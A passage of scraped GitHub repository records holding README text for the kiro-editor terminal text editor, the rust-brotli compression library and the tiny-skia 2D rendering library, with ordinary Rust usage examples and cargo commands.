`Ctrl-W` | Delete a word |\n| `Ctrl-J` | Delete until head of line |\n| `Ctrl-K` | Delete until end of line |\n| `Ctrl-M` | Insert new line |\n| `Ctrl-U` | Undo last change |\n| `Ctrl-R` | Redo last undo change |\n\nHere is some screenshots for basic features.\n\n- **Create a new file**\n\n\"screenshot\n\n- **Incremental text search**\n\n\"screenshot\n\n\n### Extended Features\n\n#### Support Editing UTF-8 Text\n\nKiro is a UTF-8 text editor. 
So you can open, create, insert, delete, and search UTF-8 text, including double-width characters.\n\n![UTF-8 supports](https://github.com/rhysd/ss/blob/master/kiro-editor/multibyte_chars.gif?raw=true)\n\nNote that emojis using `U+200D` (zero width joiner) like '\ud83d\udc6a' are not supported yet.\n\nPlease read the 'Support Editing UTF-8 Text' subsection for implementation details.\n\n#### 24-bit colors (true colors) and 256 colors support\n\nKiro utilizes as many colors as your terminal supports. It outputs 24-bit colors\nwith the [gruvbox][] color scheme, falling back to 256 colors or eventually to 16 colors.\n\n- **24-bit colors**\n\n(screenshot: 24-bit colors)\n\n- **256 colors**\n\n(screenshot: 256 colors)\n\n- **16 colors**\n\n(screenshot: 16 colors)\n\n#### Handle window resize\n\nThe terminal notifies the application of a window resize via the SIGWINCH signal. Kiro catches the signal and properly redraws\nits screen with the new window size.\n\n![resize window](https://github.com/rhysd/ss/blob/master/kiro-editor/resize.gif?raw=true)\n\n### Undo/Redo\n\nKiro supports undo/redo editing (`Ctrl-U` for undo, `Ctrl-R` for redo). The maximum number of history entries\nis 1000; beyond that, the oldest entry is removed when a new change is added.\n\n(screenshot: undo/redo)\n\n\n\n## Implementation\n\nThis project was a study to understand how a text editor interacting with a terminal can be implemented. I learned many things about the interactions between a terminal and an application,\nand several specs of terminal escape sequences such as VT100 and xterm.\n\nI started by porting the awesome minimal text editor [kilo][], following the guide\n['Build Your Own Text Editor'][byote], and then added several improvements to my implementation.\n\nHere I write about the topics which were particularly interesting to me.\n\n\n### Efficient Rendering and Highlighting\n\n[kilo][] updates rendering and highlighting each time you input a key. This keeps the implementation simple,\nand it works fine.\n\nHowever, it is inefficient, and I felt some performance issues when editing larger (10000+ line) C files.\n\nSo [Kiro][] improves the implementation to render the screen and update highlighting only when\nnecessary.\n\n[Kiro][] has a variable `dirty_start` in the `Screen` struct of [screen.rs](./src/screen.rs). It tracks\nthe line from which rendering should start.\n\nFor example, let's say we have the C code below:\n\n```c\nint main() {\n    printf(\"hello\\n\");\n}\n```\n\nNow insert `!`, making it `printf(\"hello!\\n\");`.\n\nIn this case, the first line does not change, so we don't need to update it. However, Kiro also renders\nthe `}` line even though it does not change, because modifying text may change the highlighting\nof the lines that follow. For example, when the `\"` after `\\n` is deleted, the string literal is not terminated, so\nthe next line continues the string-literal highlighting.\n\nHighlighting has a similar characteristic. Though [kilo][] recalculates the highlighting of the entire text buffer\non every key input, the lines below the bottom of the screen are never rendered.\nWith the current syntax highlighting, changes to earlier lines may affect the highlighting of later lines\n(e.g. block comments `/* */`), but changes to later lines don't affect earlier lines. So Kiro\nstops calculating highlights at the bottom line of the screen.\n\n\n### UTF-8 Support\n\n[kilo][] only supports ASCII text. The width of an ASCII character is fixed at 1 byte.
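\n\nUTF-8 characters, by contrast, occupy a variable number of bytes each, as a quick Rust illustration shows:\n```rust\nfn main() {\n    // Each char reports how many bytes its UTF-8 encoding takes.\n    for c in \"Rust\ud83e\udd80\u826f\u3044\".chars() {\n        println!(\"{}: {} byte(s)\", c, c.len_utf8()); // 1, 1, 1, 1, 4, 3, 3\n    }\n}\n```\n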
The fixed-width ASCII assumption reduces\nthe complexity of kilo's implementation greatly because:\n\n- every character can be represented as `char` (almost the same as `u8` in Rust)\n- any character in ASCII text can be accessed via its byte index in O(1)\n- the length of the text is the same as the number of bytes of the text\n\nSo kilo can keep the text buffer as a simple `char *` and access characters in it via byte indices.\nIn addition, the display width of all printable ASCII characters is fixed, except for the `0x09` tab character.\n\nBut there are many more characters in the world, defined as Unicode characters. Since I'm Japanese,\nthe characters such as Kanji and Hiragana that I use daily are not ASCII, and the most widespread text encoding\nis UTF-8. So I decided to extend the Kiro editor to support UTF-8.\n\nIn UTF-8, the byte length of a character is variable: a character takes 1~4 bytes (or more in special cases).\nThe important point here is that accessing a character in UTF-8 text is not O(1). To access the N-th\ncharacter or to know the length of the text, the characters must be checked from the head of the text.\n\nAccessing characters and getting the text length happen frequently while updating the text buffer\nand highlights, so paying O(N) each time is not efficient. To solve this problem, Kiro\nstores the byte indices of the characters of a line as a `Vec<usize>`. These indices exist only\nwhen at least one character in the line is non-ASCII.\n\n![UTF-8 support diagram](./assets/utf-8-support-diagram.png)\n\nIn the `Row` struct, which represents one line of text, the `indices` field (`Vec<usize>`) is dedicated to storing\nthe byte index of each character.\n\nIn the first case, `\"Rust is nice\"`, all characters are ASCII, so byte indices can be used to access\ncharacters in the text directly. In this case the `indices` field is empty (with its capacity set to zero). A `Vec`\ninstance with zero capacity is guaranteed not to allocate heap memory, so the memory overhead here is\nonly the 24 bytes of the `Vec` instance itself (a pointer, a capacity `usize`, and a length `usize`).\n\nIn the second case, `\"Rust\ud83e\udd80\u826f\u3044\"`, there are some non-ASCII characters, so `self.indices` caches the byte\nindex of each character. Thanks to this cache, each character can be accessed in O(1) and the text\nlength can be obtained in O(1) as `self.indices.len()`. `Row` also contains the rendered text and updates\nit when the internal text buffer is updated by `TextBuffer`, so the `self.indices` cache is also updated\nefficiently at the same time.\n\nThough keeping byte indices in a `Vec<usize>` is quite memory inefficient, the indices are only required\nwhen the line contains non-ASCII characters, which is a relatively rare case for a code editor, I believe.\n\n\n### Text Editing as Sequence of Diffs\n\nIn the Kiro editor, every text edit is represented as a diff of the text, so text editing means applying diffs to\nthe current text buffer. Undo is represented as 'unapplying' diffs; redo is represented as applying them\nagain.\n\nOne undo is represented as multiple diffs, not one diff, because users usually don't want to\nundo one inserted character at a time. So the diffs in which each character is inserted are put together as one\nundo unit.\n\n![Undo/Redo support diagram](./assets/undo-redo-support-diagram.png)\n\nFirst, a user inputs \"abc\". The input is represented as 3 diffs, one per\ncharacter, which together form one undo unit.
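\n\nA minimal sketch of this model, using hypothetical simplified types (Kiro's actual `edit_diff.rs` and `history.rs` are richer than this sketch):\n```rust\n// One text edit, expressed as a reversible diff (hypothetical simplified type).\n#[derive(Clone)]\nenum EditDiff {\n    Insert { line: usize, col: usize, text: String },\n    Delete { line: usize, col: usize, text: String },\n}\n\nimpl EditDiff {\n    fn apply(&self, buf: &mut Vec<String>) {\n        match self {\n            EditDiff::Insert { line, col, text } => buf[*line].insert_str(*col, text),\n            EditDiff::Delete { line, col, text } => {\n                buf[*line].replace_range(*col..*col + text.len(), \"\")\n            }\n        }\n    }\n\n    // Undo unapplies a diff by applying its inverse.\n    fn inverse(&self) -> EditDiff {\n        match self.clone() {\n            EditDiff::Insert { line, col, text } => EditDiff::Delete { line, col, text },\n            EditDiff::Delete { line, col, text } => EditDiff::Insert { line, col, text },\n        }\n    }\n}\n\nfn main() {\n    let mut buf = vec![String::new()];\n    // Typing \"abc\" produces three insertion diffs forming a single undo unit.\n    let unit: Vec<EditDiff> = \"abc\".chars().enumerate()\n        .map(|(i, c)| EditDiff::Insert { line: 0, col: i, text: c.to_string() })\n        .collect();\n    for d in &unit {\n        d.apply(&mut buf);\n    }\n    assert_eq!(buf[0], \"abc\");\n    // One undo unapplies the whole unit, newest diff first.\n    for d in unit.iter().rev() {\n        d.inverse().apply(&mut buf);\n    }\n    assert_eq!(buf[0], \"\");\n}\n```\n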
So inserting \"abc\" is reverted at once on undo even though\nit is represented as multiple diffs.\nThen the user moves the cursor back by one character and deletes the characters \"ab\" up to the head of the line. This is represented\nas one diff.\nFinally, the user adds a new line with the ENTER key. Inserting a line is represented as two diffs: first, the editor\ntruncates the text after the cursor (\"c\"), and then it inserts \"c\" as a new line below the cursor. These\ntwo diffs form one undo unit.\n\nBy managing the history of text editing with undo units, every text edit can be represented as a sequence of\ndiffs. Redo applies the diffs of one undo unit to the current text buffer, and undo unapplies the diffs of one undo\nunit.\n\nNormal input is also treated as redo internally, so the editor doesn't need to handle normal input with a\nseparate implementation.\n\n### Porting C editor to Rust\n\n#### Separate one C source into several Rust modules\n\nTo simplify and minimize the implementation, [kilo][] uses some global variables and local `static`\nvariables. The editor's state is stored in a global variable `E`, which is referenced everywhere.\n\nWhile porting the code to Rust, I split `kilo.c` into several Rust modules, one per concern, and removed\nthe global variables and local static variables by moving them into each module's structs.\n\n- [`editor.rs`](src/editor.rs): Exports the `Editor` struct, which manages the editor lifecycle; it runs a loop\n which gets key input, updates the text buffer and highlighting, then renders the screen.\n- [`text_buffer.rs`](src/text_buffer.rs): Exports the `TextBuffer` struct, which manages an editing text\n buffer as a `Vec<Row>`. It also contains metadata such as the file name and file type of the buffer.\n- [`edit_diff.rs`](src/edit_diff.rs): Editing text is defined as applying a sequence of diffs to the text.\n This module exports the enum `EditDiff`, which represents a diff, and the logic to apply it to text.\n- [`row.rs`](src/row.rs): Exports the `Row` struct, which represents one line of the text buffer and contains\n the actual text and the rendered text. Since Kiro is dedicated to UTF-8 text editing, the internal text buffer\n is also kept as a UTF-8 string. When the internal text buffer is updated by `Editor`, it automatically\n updates the rendered text as well. It may also contain character indices for non-ASCII UTF-8 characters\n (please see the 'UTF-8 Support' section above).\n- [`history.rs`](src/history.rs): Exports the `History` struct, which manages the edit history. The history\n is represented as a sequence of edit diffs. It manages the undo/redo state and how many changes should\n happen on one undo/redo operation.\n- [`input.rs`](src/input.rs): Exports the `StdinRawMode` struct and the `InputSequences` iterator.\n `StdinRawMode` sets up STDIN in raw mode (disabling various terminal features such as echo back).\n `InputSequences` reads the user's key input as a byte sequence with a timeout and parses it into a stream of\n key sequences. VT100 and xterm escape sequences like `\\x1b[D` for the `\u2190` key are parsed here.\n- [`highlight.rs`](src/highlight.rs): Exports the `Highlighting` struct, which contains the highlight information\n of each character in the text buffer. It also manages highlighting over the editor lifecycle. It calculates\n the highlights of the characters that are rendered and updates this information.\n- [`screen.rs`](src/screen.rs): Exports the `Screen` struct, which represents screen rendering. It renders\n each `Row` with highlight colors by outputting characters and escape sequences to STDOUT. As described\n in the previous section, it manages efficient rendering.
It also manages and renders the status bar and message\n bar located at the bottom of the screen.\n- [`status_bar.rs`](src/status_bar.rs): Exports the `StatusBar` struct, which manages the fields displayed in the\n status bar. It has a `redraw` flag to determine whether it should be re-rendered.\n- [`prompt.rs`](src/prompt.rs): Exports structs related to prompting the user via the message bar. This module\n has the logic to run user prompts and text search. Callbacks during a prompt are represented by the `PromptAction`\n trait.\n- [`term_color.rs`](src/term_color.rs): Exports the small `TermColor` and `Color` enums, which represent\n terminal colors. This module also has the logic to detect the terminal's 24-bit and 256-color support.\n- [`language.rs`](src/language.rs): Exports the small `Language` enum, which represents file types like\n C, Rust, Go, JavaScript, and C++. It contains the logic to detect a file type from the file name.\n- [`signal.rs`](src/signal.rs): Exports the `SigwinchWatcher` struct, which receives the SIGWINCH signal and\n notifies `Screen`. The signal is sent when the terminal window size changes; `Screen` needs\n the notification to resize the screen.\n- [`error.rs`](src/error.rs): Exports the `Error` enum and the `Result` type to handle all kinds of errors\n which may occur in the Kiro editor.\n\n#### Error handling and resource clean up\n\n[kilo][] outputs a message via `perror()` and immediately exits on error. It also cleans up the STDIN\nconfiguration with an `atexit` hook.\n\nKiro is implemented in Rust, so it utilizes Rust idioms to handle errors with `io::Result` and the `?`\noperator. This reduces the error-handling code so that I could focus on implementing the editor logic.\n\nFor resource cleanup, Rust's `Drop` trait works great in `input.rs`.\n\n```rust\nstruct StdinRawMode {\n    stdin: io::Stdin,\n    // ...\n}\n\nimpl StdinRawMode {\n    fn new() -> io::Result<StdinRawMode> {\n        // Setup terminal raw mode of stdin here\n        // ...\n    }\n}\n\nimpl Drop for StdinRawMode {\n    fn drop(&mut self) {\n        // Restore original terminal mode of stdin here\n    }\n}\n\nimpl Deref for StdinRawMode {\n    type Target = io::Stdin;\n    fn deref(&self) -> &Self::Target {\n        &self.stdin\n    }\n}\n\nimpl DerefMut for StdinRawMode {\n    fn deref_mut(&mut self) -> &mut Self::Target {\n        &mut self.stdin\n    }\n}\n```\n\nThe `drop()` method is called when a `StdinRawMode` instance dies, so the user doesn't need to remember\nthe cleanup. `StdinRawMode` also implements `Deref` and `DerefMut` so that it behaves almost\nas if it were `Stdin`. By wrapping `io::Stdin` like this, I could add the ability to enter/leave\nterminal raw mode to `io::Stdin`.\n\n#### Abstract input and output of editor\n\n```rust\npub struct Editor<I, W>\nwhere\n    I: Iterator<Item = io::Result<InputSeq>>,\n    W: Write,\n{\n    // ...\n}\n\nimpl<I, W> Editor<I, W>\nwhere\n    I: Iterator<Item = io::Result<InputSeq>>,\n    W: Write,\n{\n    // Initialize Editor struct with given input and output\n    pub fn new(input: I, output: W) -> io::Result<Editor<I, W>> {\n        // ...\n    }\n}\n```\n\nThe input of a terminal text editor is a stream of input sequences from the terminal, which includes the\nuser's key input and control sequences. The input is represented with the `Iterator` trait over input sequences.\nHere `InputSeq` represents one key input or one control sequence.\n\nThe output of a terminal text editor is also a stream of sequences to the terminal, which includes output\nstrings and control sequences. It's done by simply writing to stdout, so it is represented with the\n`Write` trait.\n\nThe benefit of these abstractions is the testability of each module.
By creating a dummy struct which implements `Iterator<Item = io::Result<InputSeq>>`, the input can be easily replaced with dummy input.\nSince [kilo][] does not have tests, these abstractions are not necessary for it.\n\n```rust\nstruct DummyInput(Vec<InputSeq>);\n\nimpl Iterator for DummyInput {\n    type Item = io::Result<InputSeq>;\n\n    fn next(&mut self) -> Option<Self::Item> {\n        if self.0.is_empty() {\n            None\n        } else {\n            Some(Ok(self.0.remove(0)))\n        }\n    }\n}\n\n// Dummy Ctrl-Q input to editor\nlet dummy_input = DummyInput(vec![ InputSeq::ctrl(b'q') ]);\n```\n\nAnd by implementing a small struct which simply discards output, we can ignore the output. It does\nnot need to draw the screen in a terminal window, and it does not rely on global state (terminal raw mode),\nso tests can run in parallel. As a result, tests run faster and the terminal window doesn't get messed up.\n\n```rust\nstruct Discard;\n\nimpl Write for Discard {\n    fn write(&mut self, buf: &[u8]) -> io::Result<usize> {\n        Ok(buf.len())\n    }\n\n    fn flush(&mut self) -> io::Result<()> {\n        Ok(())\n    }\n}\n```\n\nBy using these mocks, the input and output of the editor can be tested easily as follows:\n\n```rust\n#[test]\nfn test_editor() {\n    let mut editor = Editor::new(dummy_input, Discard).unwrap();\n    editor.edit().unwrap();\n    for line in editor.lines() {\n        // Check lines of the current text buffer\n    }\n}\n```\n\n#### Dependent Crates\n\nThis project depends on some small crates. I selected them carefully so that they would not prevent\nlearning how a text editor on a terminal works.\n\n- [termios][]: Safe binding to the `termios` interface provided by the OS.\n- [term_size][]: Safe binding for getting the terminal window size with ioctl(2).\n- [unicode-width][]: Small library to calculate a Unicode character's display width.\n- [term][]: Library for terminfo and terminal colors. This project uses this library only to parse\n terminfo for 256 colors support.\n- [signal-hook][]: Small wrapper for signal handlers, used to catch SIGWINCH for resize support.\n- [getopts][]: Fairly small library to parse command line arguments. Kiro only has quite simple CLI\n options, so [clap][] is too heavy.\n\n\n### TODO\n\n- Unit tests are not sufficient. More tests should be added\n- Improve scrolling performance (Is terminal scrolling available?)\n- Minimal documentation\n- Text selection and copy from or paste to system clipboard\n- Keeping all highlights (`Vec`) is not memory efficient. Keep bits only for the current\n screen (`rowoff..rowoff+num_rows`)\n- Use a parser library such as [combine](https://github.com/Marwes/combine) or [nom](https://github.com/Geal/nom)\n to calculate highlighting. Needs some investigation, since the highlight parser must stop calculating when\n the current line exceeds the bottom line of the screen.
Also [syntect](https://github.com/trishume/syntect) is\n interesting.\n\n\n### Future Works\n\n- Use incremental parsing for accurate syntax highlighting\n- Support more systems and terminals\n- Look editor configuration file such as [EditorConfig](https://editorconfig.org/)\n or [`.vscode` VS Code workspace settings](https://code.visualstudio.com/docs/getstarted/settings)\n- Support emojis using `U+200D`\n- WebAssembly support\n- Mouse support\n- Completion, go to definition and look up using language servers\n\n\n### Development\n\nBenchmarks are done by [cargo bench][cargo-bench] and fuzzing is done by [cargo fuzz][cargo-fuzz] and [libFuzzer][libfuzzer].\n\n```sh\n# Create release build\ncargo build --release\n\n# Run tests\ncargo test\n\n# Run benchmarks\ncargo +nightly bench -- --logfile out.txt && cat out.txt\n\n# Run fuzzing\ncargo +nightly fuzz run input_text\n```\n\n\n\n## License\n\nThis project is distributed under [the MIT License](./LICENSE.txt).\n\n\n[Kiro]: https://github.com/rhysd/kiro-editor\n[kilo]: https://github.com/antirez/kilo\n[byote]: https://viewsourcecode.org/snaptoken/kilo/\n[gruvbox]: https://github.com/morhetz/gruvbox\n[cargo]: https://github.com/rust-lang/cargo\n[build-badge]: https://github.com/rhysd/kiro-editor/workflows/CI/badge.svg\n[ci]: https://github.com/rhysd/kiro-editor/actions\n[crates-io]: https://crates.io/crates/kiro-editor\n[crates-io-badge]: https://img.shields.io/crates/v/kiro-editor.svg\n[termios]: https://crates.io/crates/termios\n[term_size]: https://crates.io/crates/term_size\n[unicode-width]: https://crates.io/crates/unicode-width\n[term]: https://crates.io/crates/term\n[signal-hook]: https://crates.io/crates/signal-hook\n[getopts]: https://crates.io/crates/getopts\n[clap]: https://crates.io/crates/clap\n[cargo-bench]: https://doc.rust-lang.org/cargo/commands/cargo-bench.html\n[cargo-fuzz]: https://github.com/rust-fuzz/cargo-fuzz\n[libfuzzer]: https://llvm.org/docs/LibFuzzer.html\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dropbox/rust-brotli", "link": "https://github.com/dropbox/rust-brotli", "tags": ["decompression", "brotli", "rust", "brotli-decompressor", "rustlang", "safe", "brotli-compression", "brotli-encoder", "brotli-compressor", "compression", "compressor"], "stars": 673, "description": "Brotli compressor and decompressor written in rust that optionally avoids the stdlib", "lang": "Rust", "repo_lang": "", "readme": "# rust-brotli\n\n[![crates.io](https://img.shields.io/crates/v/brotli.svg)](https://crates.io/crates/brotli)\n[![Build Status](https://travis-ci.org/dropbox/rust-brotli.svg?branch=master)](https://travis-ci.org/dropbox/rust-brotli)\n\n\n## What's new in 3.2\n* into_inner conversions for both Reader and Writer classes\n\n## What's new in 3.0\n* A fully compatible FFI for drop-in compatibiltiy with the https://github.com/google/brotli binaries\n * custom allocators fully supported\n* Multithreaded compression so multiple threads can operate in unison on a single file\n* Concatenatability mode to add the feature requested in https://github.com/google/brotli/issues/628\n * binary tool catbrotli can accomplish this if the first file was specified with -apendable and the second with -catable\n* validation mode where a file is double-checked to be able to be decompressed with the same settings; useful for benchmarking or fuzzing\n* Magic Number: where the brotli file can have a useful header with a few magic bytes, concatability info and 
a final output size for pre-allocating memory\n\n## What's new in 2.5\n* In 2.5, the callback also passes down an allocator to make new StaticCommands and PDFs and 256 bit floating point vectors.\n* In 2.4, the callback with the compression intermediate representation now passes a full metablock at a time. Also, these items are mutable\nin case further optimization is desired\n\n## What's new in 2.3\n\n* Flush now produces output instead of calling finish on the stream. This allows you to use the writer abstraction to\nget immediate output without having to resort to the CompressStream internal abstraction\n\n## Project Requirements\n\nDirect no-stdlib port of the C brotli compressor to Rust\n\nno dependency on the Rust stdlib: this library would be ideal for decompressing within a rust kernel among other things.\n\nThis is useful to see how C and Rust compare in an apples-to-apples\ncomparison where the same algorithms and data structures and\noptimizations are employed.\n\n## Compression Usage\n\nRust brotli currently supports compression levels 0 - 11.\nThey should be bitwise identical to the brotli C compression engine at compression levels 0-9.\nThe recommended lg_window_size is between 20 and 22.\n\n### With the io::Read abstraction\n```rust\nlet mut input = brotli::CompressorReader::new(&mut io::stdin(), 4096 /* buffer size */,\n quality as u32, lg_window_size as u32);\n```\nthen you can simply read input as you would any other io::Read class\n\n### With the io::Write abstraction\n\n```rust\nlet mut writer = brotli::Compressor::new(&mut io::stdout(), 4096 /* buffer size */,\n quality as u32, lg_window_size as u32);\n```\n\nThere are also methods to build Compressor Readers or Writers using the with_params static function,\n\ne.g.:\n```rust\nlet params = BrotliEncoderParams::default();\n// modify params to fit the application needs\nlet mut writer = brotli::Compressor::with_params(&mut io::stdout(), 4096 /* buffer size */,\n params);\n```\nor for the reader\n```rust\nlet params = BrotliEncoderParams::default();\n// modify params to fit the application needs\nlet mut writer = brotli::CompressorReader::with_params(&mut io::stdin(), 4096 /* buffer size */,\n params);\n```\n\n\n### With the Stream Copy abstraction\n\n```rust\nmatch brotli::BrotliCompress(&mut io::stdin(), &mut io::stdout(), &brotli_encoder_params) {\n Ok(_) => {},\n Err(e) => panic!(\"Error {:?}\", e),\n}\n```\n\n## Decompression Usage\n\n### With the io::Read abstraction\n\n```rust\nlet mut input = brotli::Decompressor::new(&mut io::stdin(), 4096 /* buffer size */);\n```\nthen you can simply read input as you would any other io::Read class\n\n### With the io::Write abstraction\n\n```rust\nlet mut writer = brotli::DecompressorWriter::new(&mut io::stdout(), 4096 /* buffer size */);\n```\n\n### With the Stream Copy abstraction\n\n```rust\nmatch brotli::BrotliDecompress(&mut io::stdin(), &mut io::stdout()) {\n Ok(_) => {},\n Err(e) => panic!(\"Error {:?}\", e),\n}\n```\n
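Tying the pieces above together, here is a minimal in-memory round trip using the same reader types. This sketch is not part of the rust-brotli README; it assumes the `brotli` crate as a dependency (default features), and the quality and window values are arbitrary examples:

```rust
use std::io::Read;

/// Compress `data` by pulling from a `CompressorReader`, then feed the
/// compressed bytes through a `Decompressor` and check the round trip.
fn roundtrip(data: &[u8]) -> std::io::Result<()> {
    // `&[u8]` implements `io::Read`, so it can stand in for stdin here.
    let mut compressed = Vec::new();
    brotli::CompressorReader::new(data, 4096 /* buffer size */, 9 /* quality */, 22 /* lg_window_size */)
        .read_to_end(&mut compressed)?;

    let mut decompressed = Vec::new();
    brotli::Decompressor::new(&compressed[..], 4096 /* buffer size */)
        .read_to_end(&mut decompressed)?;

    assert_eq!(data, &decompressed[..]);
    Ok(())
}
```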
### With manual memory management\n\nThere are 3 steps to using brotli without stdlib:\n\n1. setup the memory manager\n2. setup the BrotliState\n3. in a loop, call BrotliDecompressStream\n\nIn detail:\n\n```rust\n// at global scope declare a MemPool type -- in this case we'll choose the heap to\n// avoid unsafe code, and avoid restrictions of the stack size\n\ndeclare_stack_allocator_struct!(MemPool, heap);\n\n// at local scope, make heap-allocated buffers to hold u8's, u32's and Huffman codes\nlet mut u8_buffer = define_allocator_memory_pool!(4096, u8, [0; 32 * 1024 * 1024], heap);\nlet mut u32_buffer = define_allocator_memory_pool!(4096, u32, [0; 1024 * 1024], heap);\nlet mut hc_buffer = define_allocator_memory_pool!(4096, HuffmanCode, [0; 4 * 1024 * 1024], heap);\nlet heap_u8_allocator = HeapPrealloc::<u8>::new_allocator(4096, &mut u8_buffer, bzero);\nlet heap_u32_allocator = HeapPrealloc::<u32>::new_allocator(4096, &mut u32_buffer, bzero);\nlet heap_hc_allocator = HeapPrealloc::<HuffmanCode>::new_allocator(4096, &mut hc_buffer, bzero);\n\n// At this point no more syscalls are going to be needed since everything can come from the allocators.\n\n// Feel free to activate SECCOMP jailing or other mechanisms to secure your application if you wish.\n\n// Now it's possible to setup the decompressor state\nlet mut brotli_state = BrotliState::new(heap_u8_allocator, heap_u32_allocator, heap_hc_allocator);\n\n// at this point the decompressor simply needs an input and output buffer and the ability to track\n// the available data left in each buffer\nloop {\n result = BrotliDecompressStream(&mut available_in, &mut input_offset, &input.slice(),\n &mut available_out, &mut output_offset, &mut output.slice_mut(),\n &mut written, &mut brotli_state);\n\n // just end the decompression if result is BrotliResult::ResultSuccess or BrotliResult::ResultFailure\n}\n```\n\nThis interface is the same interface that the C brotli decompressor uses.\n\nAlso feel free to use custom allocators that invoke Box directly.\nThis example illustrates a mechanism to avoid subsequent syscalls after the initial allocation.\n\n## Using the C interface\n\nrust-brotli is a drop-in replacement for the official https://github.com/google/brotli C\nimplementation. 
That means you can use it from any place that supports that library.\nTo build rust-brotli in this manner, enter the c subdirectory and run make there (`cd c && make`).\n\nThis should build c/target/release/libbrotli.so and the vanilla\ncommand line tool in C for compressing and decompressing any brotli file.\n\nThe libbrotli.so in c/target/release should be able to replace any other libbrotli.so\nfile, but with all the advantages of using safe rust (except in the FFI bindings).\n\nThe code also allows a wider range of options, including forcing the prediction mode\n(e.g. UTF8 vs signed vs MSB vs LSB) and changing the weight of the literal cost from 540\nto other values.\n\nAdditionally the CATABLE and APPENDABLE options are exposed and allow concatenation of files\ncreated in this manner.\n\nSpecifically, CATABLE files can be concatenated in any order using the catbrotli tool,\nand APPENDABLE files can be the first file in a sequence of catable files...\ne.g. you can combine\n`appendable.br catable1.br catable2.br catable3.br`\n\nor simply\n`catable0.br catable1.br catable2.br catable3.br`\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RazrFalcon/tiny-skia", "link": "https://github.com/RazrFalcon/tiny-skia", "tags": [], "stars": 673, "description": "A tiny Skia subset ported to Rust", "lang": "Rust", "repo_lang": "", "readme": "# tiny-skia\n![Build Status](https://github.com/RazrFalcon/tiny-skia/workflows/Rust/badge.svg)\n[![Crates.io](https://img.shields.io/crates/v/tiny-skia.svg)](https://crates.io/crates/tiny-skia)\n[![Documentation](https://docs.rs/tiny-skia/badge.svg)](https://docs.rs/tiny-skia)\n[![Rust 1.51+](https://img.shields.io/badge/rust-1.51+-orange.svg)](https://www.rust-lang.org)\n\n`tiny-skia` is a tiny [Skia] subset ported to Rust.\n\nThe goal is to provide an absolutely minimal, CPU-only, 2D rendering library for the Rust ecosystem,\nwith a focus on rendering quality, speed and binary size.\n\nAnd while `tiny-skia` is definitely tiny, it supports all the common 2D operations\nlike: filling and stroking a shape with a solid color, gradient or pattern;\nstroke dashing; clipping; images blending; PNG load/save.\nThe main missing feature is text rendering\n(see [#1](https://github.com/RazrFalcon/tiny-skia/issues/1)).\n\n**Note:** this is not a Skia replacement and never will be. It's more of a research project.\n\n## Motivation\n\nThe main motivation behind this library is to have a small, high-quality 2D rendering\nlibrary that can be used by [resvg]. And the choice is rather limited.\nYou basically have to choose between [cairo], Qt and Skia. And all of them are\nrelatively bloated, hard to compile and distribute. Not to mention that none of them\nare written in Rust.\n\nBut if we ignore those problems and focus only on quality and speed alone,\nSkia is by far the best one.\nHowever, the main problem with Skia is that it's huge. 
Really huge.\nIt supports CPU and GPU rendering, multiple input and output formats (including SVG and PDF),\nvarious filters, color spaces, color types and text rendering.\nIt consists of 370 KLOC without dependencies (around 7 MLOC with dependencies)\nand requires around 4-8 GiB of disk space to be built from sources.\nAnd the final binary is 3-8 MiB big, depending on enabled features.\nNot to mention that it requires `clang` and no other compiler\nand uses an obscure build system (`gn`) which was using Python2 until recently.\n\n`tiny-skia` tries to be small, simple and easy to build.\nCurrently, it has around 14 KLOC, compiles in less than 5s on a modern CPU\nand adds around 200KiB to your binary.\n\n## Performance\n\nCurrently, `tiny-skia` is 20-100% slower than Skia on x86-64 and about 100-300% slower on ARM.\nWhich is still faster than [cairo] and [raqote] in many cases.\nSee benchmark results [here](https://razrfalcon.github.io/tiny-skia/x86_64.html).\n\nThe heart of Skia's CPU rendering is\n[SkRasterPipeline](https://github.com/google/skia/blob/master/src/opts/SkRasterPipeline_opts.h).\nAnd this is an extremely optimized piece of code.\nBut to be a bit pedantic, it's not really C++ code. It relies on clang's\nnon-standard vector extensions, which means that it works only with clang.\nYou can actually build it with gcc/msvc, but it will simply ignore all the optimizations\nand become 15-30 *times* slower! Which makes it kinda useless.\n\nAlso note that neither Skia nor `tiny-skia` supports dynamic CPU detection,\nso by enabling newer instructions you're making the resulting binary non-portable.\n\nEssentially, you will get decent performance on x86 targets by default.\nBut if you are looking for even better performance, you should compile your application\nwith the `RUSTFLAGS=\"-Ctarget-cpu=haswell\"` environment variable to enable AVX instructions.\n\nWe support ARM AArch64 NEON as well, and there is no need to pass any additional flags.\n\nYou can find more information in [benches/README.md](./benches/README.md).\n\n## Rendering quality\n\nUnless there is a bug, `tiny-skia` must produce exactly the same results as Skia.\n\n## Safety\n\nWhile a quick search will show tons of `unsafe`, the library is actually fully safe.\nAll pixel access is bounds-checked. And all memory-related operations are safe.\n\nWe must use `unsafe` to call SIMD intrinsics, which is perfectly safe,\nbut Rust's std still marks them as `unsafe` because they may be missing on the target CPU.\nWe do check for that.\n\nWe also have to mark some types (to cast `[u32; 1]` to `[u8; 4]` and vice versa) as\n[bytemuck::Pod](https://docs.rs/bytemuck/1.4.1/bytemuck/trait.Pod.html),\nwhich is an `unsafe` trait, but still is perfectly safe.\n\n## Out of scope\n\nSkia is a huge library and we support only a tiny part of it.\nMore importantly, we do not plan to support many of its features at all.\n\n- GPU rendering.\n- Text rendering (maybe someday).\n- PDF generation.\n- Non-RGBA8888 images.\n- Non-PNG image formats.\n- Advanced B\u00e9zier path operations.\n- Conic path segments.\n- Path effects (except dashing).\n- Any kind of resource caching.\n- ICC profiles.\n\n## Notable changes\n\nDespite being a port, we still have a lot of changes even in the supported subset.\n\n- No global alpha.
